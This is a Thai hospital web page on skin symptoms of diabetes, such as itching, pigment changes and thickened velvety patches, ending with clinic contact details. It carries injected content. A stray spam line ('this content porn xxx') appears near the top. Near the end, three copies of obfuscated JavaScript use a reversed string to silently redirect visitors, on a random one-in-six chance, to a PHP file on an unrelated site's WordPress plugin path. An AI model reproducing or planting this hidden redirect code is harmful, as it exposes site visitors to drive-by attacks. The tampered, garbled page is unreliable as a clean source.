อาการทางผิวหนังที่พบในโรคเบาหวาน

42623

this content porn xxx

โรคเบาหวานเป็นโรคที่พบมากขึ้นในปัจจุบัน และพบว่าผู้ป่วยที่เป็นโรคเบาหวานมากกว่า 70% จะมีอาการผิดปกติทางผิวหนังร่วมด้วย ซึ่งอาการทางผิวหนังบางอย่างสามารถเจอได้ตั้งแต่ระดับน้ำตาลเริ่มขึ้นโดยยังไม่เป็นเบาหวานเลย ซึ่งมีความสำคัญอย่างยิ่งในกรณีที่เริ่มมีการเปลี่ยนแปลงทางผิวหนัง ดังนั้นถ้าเราสังเกตถึงความผิดปกติทางผิวหนังและเฝ้าระวัง โดยปรับเปลี่ยนพฤติกรรมจะทำให้ลดโอกาสการเกิดเบาหวานในอนาคตได้ สำหรับอาการทางผิวหนังที่พบในผู้เป็นโรคเบาหวาน ได้แก่

  • อาการคันโดยที่ไม่มีรอยโรค พบประมาณ 20-40% ของผู้ป่วยเบาหวาน เนื่องจากผู้ป่วยเบาหวานมักมีผิวแห้ง รวมถึงอาการตาแห้งหรือน้ำลายในช่องปากน้อยลงด้วย และในผู้หญิงจะมีอาการคันบริเวณก้นและอวัยวะเพศ พบได้ประมาณ 19% โดยต้องแยกกับการติดเชื้อราด้วย ส่วนใหญ่พบในผู้ป่วยที่คุมระดับน้ำตาลไม่ดี การรักษา คือ ใช้โลชั่นให้ความชุ่มชื้น และที่สำคัญต้องคุมระดับน้ำตาลให้เป็นปกติ
  • ความผิดปกติของสีผิว ได้แก่ ด่างขาว ซึ่งพบบ่อยในผู้ป่วยเบาหวาน พบในเพศหญิงมากกว่าเพศชาย และอาจนำมาก่อนที่จะเป็นเบาหวานก็ได้ ผิวหนังเป็นสีเหลือง โดยต้องไม่เหลืองบริเวณตาขาวซึ่งเจอในภาวะดีซ่าน สาเหตุเกิดจากเมตาบอลิซึมของแคโรทีนที่ตับลดลง และอาหารที่ผู้ป่วยเบาหวานมักจะรับประทานประกอบไปด้วยอาหารที่มีแคโรทีนสูง เช่น ผักผลไม้ที่เป็นสีเหลืองพบได้ประมาณ 10% ของผู้ป่วยเบาหวาน
  • ผิวหนังเป็นปื้นหนาสีเหลือง น้ำตาล เทา ขอบเขตไม่ชัดเจนลักษณะคล้ายกำมะหยี่ ตำแหน่งที่พบ ได้แก่ ข้อพับ รักแร้ ต้นคอ ไม่มีอาการเจ็บหรือคัน บ่งถึงภาวะดื้อต่ออินซูลิน พบในผู้ป่วยที่อ้วน ถุงน้ำที่รังไข่หลายใบ และเบาหวานชนิดที่ 2 และโรคที่เกี่ยวข้องกับฮอร์โมนอีกหลายชนิด เช่น โรค Acromegaly Cushing’s syndrome เป็นต้น
  • ตุ่มนูนแข็ง มีอาการคันมาก มีลักษณะเป็นตุ่มนูนสีเหลือง น้ำตาล มีเคราติน plug อยู่ตรงกลาง พบบริเวณแขน ขา ลำตัว และมีอาการคันมาก พบในผู้ป่วยเบาหวานที่เป็นมานานกว่า 10 ปี โดยเฉพาะมีโรคไตวายร่วมด้วย
  • ตุ่มนูนสีแดง ไม่คัน มีลักษณะเป็นตุ่ม หรือปื้นสีแดงเป็นวงกลม หรือวงแหวน ไม่คัน พบตามลำตัว แขน ขา เป็นต้น

สอบถามรายละเอียดเพิ่มเติมได้ที่
คลินิกโรคระบบต่อมไร้ท่อและเบาหวาน

โทร. 0 2265 7777 

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom_1572595887212{margin-bottom: 15px !important;}” tdc_css=””]
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ton_block=”true” link=”url:http%3A%2F%2Fwww.vichaiyut.co.th%2Fhealth%2Fdiseases-treatment%2F%25e0%25b9%2582%25e0%25b8%25a3%25e0%25b8%2584%25e0%25b9%2584%25e0%25b8%2597%25e0%25b8%25a3%25e0%25b8%25ad%25e0%25b8%25a2%25e0%25b8%2594%25e0%25b9%258c%25e0%25b8%2595%25e0%25b9%2588%25e0%25b8%25b3%25e0%25b8%25a3%25e0%25b8%25b0%25e0%25b8%25ab%25e0%25b8%25a7%25e0%25b9%2588%25e0%25b8%25b2%25e0%25b8%2587%25e0%25b8%2581%25e0%25b8%25b2%2F|title:%E0%B9%82%E0%B8%A3%E0%B8%84%E0%B9%84%E0%B8%97%E0%B8%A3%E0%B8%AD%E0%B8%A2%E0%B8%94%E0%B9%8C%E0%B8%95%E0%B9%88%E0%B8%B3%E0%B8%A3%E0%B8%B0%E0%B8%AB%E0%B8%A7%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%95%E0%B8%B1%E0%B9%89%E0%B8%87%E0%B8%84%E0%B8%A3%E0%B8%A3%E0%B8%A0%E0%B9%8C%20(Hypothyroid%20during%20pregnancy)|target:%20_blank|”]
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ton_block=”true” link=”url:http%3A%2F%2Fwww.vichaiyut.co.th%2Fprofile_doctor%2F%25e0%25b8%259e%25e0%25b8%258d-%25e0%25b8%25aa%25e0%25b8%25b8%25e0%25b8%259e%25e0%25b8%25a3%25e0%25b8%25a3%25e0%25b8%2593%25e0%25b8%25b4%25e0%25b8%2581%25e0%25b8%25b2%25e0%25b8%25a3%25e0%25b9%258c-%25e0%25b9%2580%25e0%25b8%2588%25e0%25b8%25a3%25e0%25b8%25b4%25e0%25b8%258d%2F|title:%E0%B8%9E%E0%B8%8D.%20%E0%B8%AA%E0%B8%B8%E0%B8%9E%E0%B8%A3%E0%B8%A3%E0%B8%93%E0%B8%B4%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%8C%20%E0%B9%80%E0%B8%88%E0%B8%A3%E0%B8%B4%E0%B8%8D|target:%20_blank|”]
ให้คะแนนบทความนี้
[คะแนนบทความนี้: 2.6]
เรายึดมั่นในหลักการรักษาที่ได้มาตรฐานและมีคุณภาพมาอย่างต่อเนื่อง โดยผู้ป่วยทุกรายจะได้รับการดูแลและติดตามผลการรักษาจากคณะแพทย์ผู้เชี่ยวชาญอย่างใกล้ชิด